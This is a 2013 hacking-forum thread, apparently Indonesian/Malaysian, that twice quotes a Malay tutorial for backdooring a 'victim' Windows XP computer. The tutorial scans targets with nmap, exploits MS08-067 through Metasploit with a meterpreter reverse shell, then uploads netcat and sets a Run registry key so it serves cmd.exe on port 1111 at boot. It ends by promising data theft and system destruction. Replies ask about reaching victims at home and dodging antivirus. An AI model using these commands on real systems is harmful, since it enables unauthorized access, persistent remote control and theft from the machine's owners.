Upload Backdoor to the Victim Computer

**MRezzaaa** · 01-30-2013, 08:14 PM

(03-09-2012, 06:30 AM)codebreak Wrote: Penerangan:-
Tutorial kali ini adalah proses dimana kita dapat mengawal komputer mangsa hanya dengan menggunakan Backdoor yang telah kita masukkan ke dalam komputer mangsa. Komputer mangsa mestilah menggunakan Windows XP. JOM!!

Perkakasan Yang Diperlukan:-
1. Backtrack
2. Metasploit
3. NMap
4. NetCat

Langkah-Langkah:-
1. Buka terminal di Backtrack dan taip

Code:
# cp /pentest/windows-binaries/tools/nc.exe /root/Desktop/
Secara automaticnya di Desktop Backtrack anda akan muncul satu fail nc.exe

2. Kemudian buka terminal baru (New Tab), taipkan kata arahan NMap IP Address mangsa untuk melihat OS yang digunakan

Code:
# nmap -sS -O [IP_MANGSA]
kata arahan diatas digunakan jika anda mempunyai IP Address Mangsa anda

Code:
# nmap -sS -O 192.168.1.1-255
kata arahan diatas digunakan jika anda ingin mencari mangsa secara rawak

Quote:Untuk tutorial ini, anda memerlukan mangsa yang menggunakan OS Microsoft Windows XP sahaja!

3. Setelah anda mempunyai mangsa, buka metasploit di terminal baru anda

Code:
# msfconsole

4. Kemudian taipkan kata arahan dibawah

Code:
> use exploit/windows/smb/ms08_067_netapi

Code:
> set payload windows/meterpreter/reverse_tcp

Code:
> set LHOST [IP_anda]

Code:
> set RHOST [IP_mangsa]

Code:
> exploit

5. Biarkan ianya running sehinggalah anda berjaya mendapatkan SESSION mangsa. Anda berjaya mendapatkan SESSION mangsa apabila satu kata arahan keluar iaitu

Code:
meterpreter >

6. Setelah itu, taipkan kata arahan dibawah untuk memasukkan Backdoor nc.exe tadi ke dalam komputer mangsa

Code:
> upload /root/Desktop/nc.exe c:\\WINDOWS\\system32\\

7. Setelah proses muat naik selesai, sekarang ada proses untuk menyemak registry komputer mangsa

Code:
> reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RUN

Quote:Proses ini juga untuk menjalankan Backdoor tadi setiap kali mangsa membuka komputer

8. Sekarang adalah proses untuk mendaftar backdoor nc.exe tadi ke registry komputer mangsa

Code:
> reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RUN -v BACKDOOR -d c:\\WINDOWS\\system32\\nc.exe" -: -d -p 1111 -e cmd.exe"

9. Sekarang pula adalah proses untuk menyemak backdoor yang telah dimasukkan ke registry mangsa

Code:
> reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

Quote:Anda akan mendapati Backdoor anda telah pon berada pada registry komputer mangsa

10. Reboot komputer mangsa

Code:
> reboot

11. Setelah komputer mangsa direboot, kini masanya untuk membuat penyambungan ke komputer mangsa dengan hanya menggunakan Backdoor kita tadi. Buka terminal anda dan taipkan kata arahan dibawah

Code:
# nc [IP_MANGSA] 1111

12. DONE! kini anda telah berada di System komputer mangsa.

13. Dengan backdoor, anda boleh buat apa sahaja termasuklah mencuri data, format, delete system32, masukkan virus dan sebagainya.

PERHATIAN: Ini adalah proses pembelajaran. Gunakanlah ia dijalan yang betol. Jadilah penggodam yang berguna dan bukannya perosak

Maaf. Bahasa yang digunakan adalah Bahasa Malaysia, sekadar berkongsi dengan 2 buah negara yang saya sayang. Maaf juga kalau ada salah
-=Reserved for screen shot=-

Bro,itu kita meterpreter dlm jaringan local ? misal wifi 7-11.
setelah mangsa pulang n kembali OL di Rumahnya,apa bisa itu backdoor kita akses lagi bro ?? :-?

**copaslamer** · 01-30-2013, 11:12 PM

(01-30-2013, 08:14 PM)MRezzaaa Wrote:
(03-09-2012, 06:30 AM)codebreak Wrote: Penerangan:-
Tutorial kali ini adalah proses dimana kita dapat mengawal komputer mangsa hanya dengan menggunakan Backdoor yang telah kita masukkan ke dalam komputer mangsa. Komputer mangsa mestilah menggunakan Windows XP. JOM!!

Perkakasan Yang Diperlukan:-
1. Backtrack
2. Metasploit
3. NMap
4. NetCat

Langkah-Langkah:-
1. Buka terminal di Backtrack dan taip

Code:
# cp /pentest/windows-binaries/tools/nc.exe /root/Desktop/
Secara automaticnya di Desktop Backtrack anda akan muncul satu fail nc.exe

2. Kemudian buka terminal baru (New Tab), taipkan kata arahan NMap IP Address mangsa untuk melihat OS yang digunakan

Code:
# nmap -sS -O [IP_MANGSA]
kata arahan diatas digunakan jika anda mempunyai IP Address Mangsa anda

Code:
# nmap -sS -O 192.168.1.1-255
kata arahan diatas digunakan jika anda ingin mencari mangsa secara rawak

Quote:Untuk tutorial ini, anda memerlukan mangsa yang menggunakan OS Microsoft Windows XP sahaja!

3. Setelah anda mempunyai mangsa, buka metasploit di terminal baru anda

Code:
# msfconsole

4. Kemudian taipkan kata arahan dibawah

Code:
> use exploit/windows/smb/ms08_067_netapi

Code:
> set payload windows/meterpreter/reverse_tcp

Code:
> set LHOST [IP_anda]

Code:
> set RHOST [IP_mangsa]

Code:
> exploit

5. Biarkan ianya running sehinggalah anda berjaya mendapatkan SESSION mangsa. Anda berjaya mendapatkan SESSION mangsa apabila satu kata arahan keluar iaitu

Code:
meterpreter >

6. Setelah itu, taipkan kata arahan dibawah untuk memasukkan Backdoor nc.exe tadi ke dalam komputer mangsa

Code:
> upload /root/Desktop/nc.exe c:\\WINDOWS\\system32\\

7. Setelah proses muat naik selesai, sekarang ada proses untuk menyemak registry komputer mangsa

Code:
> reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RUN

Quote:Proses ini juga untuk menjalankan Backdoor tadi setiap kali mangsa membuka komputer

8. Sekarang adalah proses untuk mendaftar backdoor nc.exe tadi ke registry komputer mangsa

Code:
> reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RUN -v BACKDOOR -d c:\\WINDOWS\\system32\\nc.exe" -: -d -p 1111 -e cmd.exe"

9. Sekarang pula adalah proses untuk menyemak backdoor yang telah dimasukkan ke registry mangsa

Code:
> reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

Quote:Anda akan mendapati Backdoor anda telah pon berada pada registry komputer mangsa

10. Reboot komputer mangsa

Code:
> reboot

11. Setelah komputer mangsa direboot, kini masanya untuk membuat penyambungan ke komputer mangsa dengan hanya menggunakan Backdoor kita tadi. Buka terminal anda dan taipkan kata arahan dibawah

Code:
# nc [IP_MANGSA] 1111

12. DONE! kini anda telah berada di System komputer mangsa.

13. Dengan backdoor, anda boleh buat apa sahaja termasuklah mencuri data, format, delete system32, masukkan virus dan sebagainya.

PERHATIAN: Ini adalah proses pembelajaran. Gunakanlah ia dijalan yang betol. Jadilah penggodam yang berguna dan bukannya perosak

Maaf. Bahasa yang digunakan adalah Bahasa Malaysia, sekadar berkongsi dengan 2 buah negara yang saya sayang. Maaf juga kalau ada salah
-=Reserved for screen shot=-

Bro,itu kita meterpreter dlm jaringan local ? misal wifi 7-11.
setelah mangsa pulang n kembali OL di Rumahnya,apa bisa itu backdoor kita akses lagi bro ?? :-?

kagak bisa klo dia udah pulang ke rumah Angry

oh iya baru kepikiran..

pada perintah ini "reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RUN -v BACKDOOR -d c:\\WINDOWS\\system32\\nc.exe" -: -d -p 1111 -e cmd.exe"

-v BACKDOOR itu fungsi nya untuk apa ya..??

**r14n** · 02-10-2013, 05:22 PM

kalo IP public nya pegimana ya , bisa diakalin engga tuh om ?

**Kresna** · 02-25-2013, 09:53 AM

backdoornya bisa bypass antivirus gk ya?._. takutnya klo komputer korban tiba-tiba full scan komputernya, backdoor kita ke tangkep yah om?

**sector-seven** · 03-03-2013, 10:21 AM

(y) mantap nih tutorialnya

**faizul amali** · 04-25-2013, 11:38 PM

Nambah lagi ilmu nih. Semangat

**sonyrimawan** · 04-26-2013, 08:14 PM

kalau menggunakan backdoor biasanya yang di serang adalah windows 7 ya bang?

**orochimadit**$ · 04-27-2013, 04:11 AM

keren keren keren om ... backdoornya itu gi mana om..? bisa kedetect virus gak ,?

**green_word** · 04-27-2013, 10:33 AM

makasih sharenya bro Big Grin

good good

**yhojoon** · 05-03-2013, 09:20 AM

trouble suma 1, trace IP target,..
tapi banyak cara juga sih, social enginering salah satunya